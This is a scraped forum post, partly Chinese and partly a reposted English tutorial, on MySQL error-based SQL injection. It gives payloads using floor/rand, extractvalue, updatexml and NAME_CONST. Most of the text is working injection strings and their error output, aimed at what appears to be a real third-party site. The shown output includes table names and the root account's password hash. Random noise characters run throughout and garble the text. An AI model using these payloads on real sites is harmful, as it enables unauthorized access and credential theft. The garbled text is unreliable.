|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
5 [5 J- N3 [+ o首先进行正常查询: mysql> select * from article where id = 1;) U) y2 |) J# s; u& M* ^
+—-+——-+———+' b A+ a, [. V
| id | title | content |7 D; W2 } C& Y0 X! A8 k
+—-+——-+———+6 y! X+ y: {" S& w o# b0 ]
| 1 | test | do it |
8 F* O3 P: f5 t2 J" l+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);3 m" y( ?; R* k2 G
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
( j( t& w4 Y5 K- o. g$ d! E例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
) ^+ c- `/ o0 ]# ]# l9 R3 DERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
5 U( ~! `. d0 |- Q$ ~9 CERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue
3 @/ d+ H6 ]" R5 @% D; ?测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–! |9 {& |) u& d) m
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
+ K" d K+ I* ~- {0 e8 X8 {3 M% U) Q" V' [, |' A. t2 L8 r7 q. a9 E! a) W0 C
再收集: 2 c$ `5 Q- E) F) d2 ^2 ^& w
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) 6 ?1 s" K! K3 j" q
: T' w+ @) v Q- K% v0 |Error uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
. y0 |& I3 w' J
" C/ k4 W0 o" i7 \% n5 D6 bhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
0 L* G2 Q5 ` `' P6 f, P( X0 U
9 ?: P0 K* J5 d, EErroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ , ?5 e- L: r9 G: M4 K' @, c
: M0 k! {2 b+ }' t$ k
MYSQL高版本报错注入技巧-利用NAME_CONST注入& S5 i+ r3 p/ @, V Y2 Q% |2 ?7 C
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. ; l+ R, ^2 H' y* R) f2 N8 M
5 d9 v" L) N5 x1 b8 U
+ v/ C( [- @0 }$ e相关信息
) Q ]9 y* Y/ M! l9 e7 w6 O( m5 d% M6 B
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that./ U; L' F$ x- R; c6 e* V; l
% u) X$ k; i0 [6 C- P- D
Code:) ^9 Y7 r: B5 k( [
NAME_CONST(DATA, VALUE)$ `$ x! l# a/ P# M$ z2 W
: t* ^9 Q H2 A+ K- PReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.: x* P5 f$ L" D2 i0 P
7 g- N4 _5 X$ f& {
SELECT NAME_CONST('TEST', 1)# B/ A9 ?! z7 }" X: D% C
a9 T3 F1 r, [6 S
% z. n9 g- E* c+ X
; O4 S5 ^) f/ I B|---------------|# h, L% _+ c: F( R5 q; {
| TEST |6 s% j4 h5 _) A( c, q% a$ Q1 P0 k
| |1 b" u1 M0 [5 |: `6 ^
|---------------|
& X! i5 u3 Y* M/ Q' ^, l. l| 1 |
( o) z7 e8 }. r# u| |- C0 F# \$ S. A, s1 z$ L/ N
|---------------|& g. Y" V; Z" A: p) Q# g- w5 B2 _
2 e- ]2 F; t3 N P b. q5 \: B+ b1 i B q8 b
+ c9 {2 o7 f+ Y( p) W
" F# Z2 H$ L8 P9 U/ ~
http://dev.mysql.com/doc/refman/5.0/en/m...name-const
3 ^4 }2 X# D0 O% u6 oIntro to MySQL Variables( y/ q: z" c. \" Z
, V6 \7 L0 F5 G! KOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
4 _: }0 J! l+ H" c' n
0 ^6 t. c* g9 W. b9 xCode:
5 p/ E( j0 n+ Z6 yhttp://www.baido.hk/qcwh/content ... ;sid=19&cid=261% u0 G1 o+ N' h* F$ p% M
% X4 Q8 i9 Z5 g" A
3 K* v; {" {. l2 J5 O' S5 O7 \" D# ?9 |% I
# K! ?6 D/ T$ Y- c$ e8 v! s
. W& ?" h8 }* A; b, GCode:" k+ e* `) @4 D1 ]* D7 a5 M
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
, w8 D$ F9 o0 i0 z6 R) C2 A9 a3 C/ f
/ m: B$ J0 g: m. a$ b- nVAR = Your MySQL variable.
0 @9 S, O7 ?; o, f: ~
' k& f0 a q8 Z* j* F0 P/ d9 zMySQL 5.1.3 Server System Variables3 j& }: N8 d3 O/ C. x A) p: _ k
& X/ D# G8 i: N& N$ ZLet's try it out on my site..
% S; a. e6 K% I* K
8 W. {) p/ f8 |, [* p( [2 l# Y* v! BCode:
, p" r3 Q5 k$ S4 t D# }0 @http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--* O! | s- x; b* P) _: c
% x: r$ D8 B9 U; ]+ q% L4 _; [0 xErroruplicate column name '5.0.27-community-nt'
0 g1 O9 N0 f3 Z# w, W A2 `7 d3 Z. A5 D) N0 j
. L7 P0 `& O$ ]2 b- N% x2 ?
& E" q) m `5 Q: T7 w; r; ]( q+ g! K- O0 k' d1 h9 I! ]. D
) k7 A% L, t L7 yNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
W* o+ z. A# K' q" |
, G6 E# j/ e0 ?1 X( oData Extraction
1 t9 w1 E3 h3 E/ S/ y3 b! _! H, ~" A" R* m6 e+ T% a
Code:
1 L5 D0 [% R i+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
G4 s. F8 Y8 F/ \1 M- O$ B& Q- n J7 B" d. X
7 Z; k' Z. A" PWe should get a duplicate column 1 error...2 n3 ?1 b c$ ^, Q5 O# w
) N7 |0 o$ ?1 l7 Z9 _' xCode:1 @* i$ w$ @7 I6 u* b
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--! [+ d6 {" t2 D* ?& H r9 a) w# g
- V7 p+ K+ s `6 j' h+ a5 mErroruplicate column name '1
. [( D4 A$ u1 ~, e4 `, Q3 q
0 w0 w3 ?3 h5 {$ R. e
4 E) h4 M: s. n+ S3 @0 }5 l, T P
- v9 M4 ]) T; J* L4 D. @3 U( P8 q8 w i3 p2 I
; |' d: K N" b$ ] d7 o# g) e5 p
/ b+ [; i" `9 v: vNow let's get the tables out this bitch..
! g; V) V: ] o, k3 p1 o5 P+ d
. r: ?, L/ E/ j$ ]4 MCode:
6 @0 D& p) |7 s+ y# F$ B+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
6 W6 J$ P6 C2 c. w/ _, Q0 s- |3 z) Q6 l" O/ B ^& _' K
5 d# Y6 F3 {9 w6 f5 ]9 V5 H
Let's see if it works here, if it does, we can go on and finish the job.+ w; b w! k) D# [
?2 b W& M) F' p4 ?* `% ? H
Code:
Z$ v& x$ {. }! [) q! ]http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--* s9 L; V7 z2 T& d" Y( z5 C2 R
5 n' u5 \' ^" }# c2 L" P
% Q; \& q O8 H! M1 KErroruplicate column name 'com_admanage
n9 Z+ [2 |% S( g [. @
* Q+ Z2 q L; e6 z- \, o2 _2 Q
' t) Z/ N, f, J3 Z" L4 u* p
" |9 t# G5 U( @( [& o7 s$ M
0 P) N; a5 ?, K: k! u% ~* _( {, D) L% y; Z/ B( I
. _% A( J6 x% _4 b, O" S
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
; r% j9 {) Y& ~4 L, u
! Q$ A. U( F; l( R4 zLet's get the columns out of the user table..: u7 L/ ?" a' c3 ]% G: F
6 ^& q4 Z" S' o$ g; X5 F$ U- s
Code:, Z' f% a7 n" Z; ^* r! |
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--7 o. W. l; \/ t0 n) d
7 R) g5 f: {/ F& P! f, C/ r4 K5 n# \) P/ R7 l
So mine looks like this, and I get the duplicate column name 'Host'.% b4 {- z6 v7 h4 q: K; [! p) d
0 r' j, S: d0 {Code:8 x: O, V! O- `8 c' N
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--: k/ V0 E! S I7 } Q7 B% V- f% p
1 \5 t4 c9 s* t% R5 @; L
Erroruplicate column name 'Host'
& X+ H8 v7 l! g2 |* S" F0 \
`, g5 v: t6 t; @, P, Z# @5 s' _
8 z4 h9 w4 A W( _! u- D: a: U g* S! w
! A' o# Y4 K- R: h2 _; ` @
+ X2 \0 L6 o4 _4 R6 @: u
% X8 O: u- i% @% S3 dWoot, time to finish this bitch off.# ^: r9 A& Y2 ^3 f" |3 R, g
' Q+ M, {$ L/ j3 p8 [
Code:
s4 i A3 d, l% t+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
& o0 F% i7 o6 E9 L
. y4 W/ A* M; c2 ] C8 `% K
/ t- U) n: B4 M( j$ R8 _So mine looks like this...
% z' m' u3 I6 Q% |: L9 P
- Y5 C3 \: n. O7 _! }/ w3 bCode: W! ~: A. L* @8 Y8 t* U1 H
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
7 M% p6 A2 B: d
% |3 q; |4 a+ z0 m8 v; c2 jErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
, \" R, j1 ?# m2 Q0 {) ^9 P9 t: D4 I
( e" u: A+ M5 P & [ ]" |7 L* X' B r5 G
. J. F2 W+ j2 b5 o9 W3 _% F; \
' Y3 I: c. n/ W$ E2 c' _5 b& O. y+ K5 {* @ o
And there we have it, thanks for reading.. Y9 X+ ^" s2 M
/ C9 p/ j% T" ^) N4 U1 i( }5 G
|
发表于 2015-11-11 19:03:37
收藏
支持
反对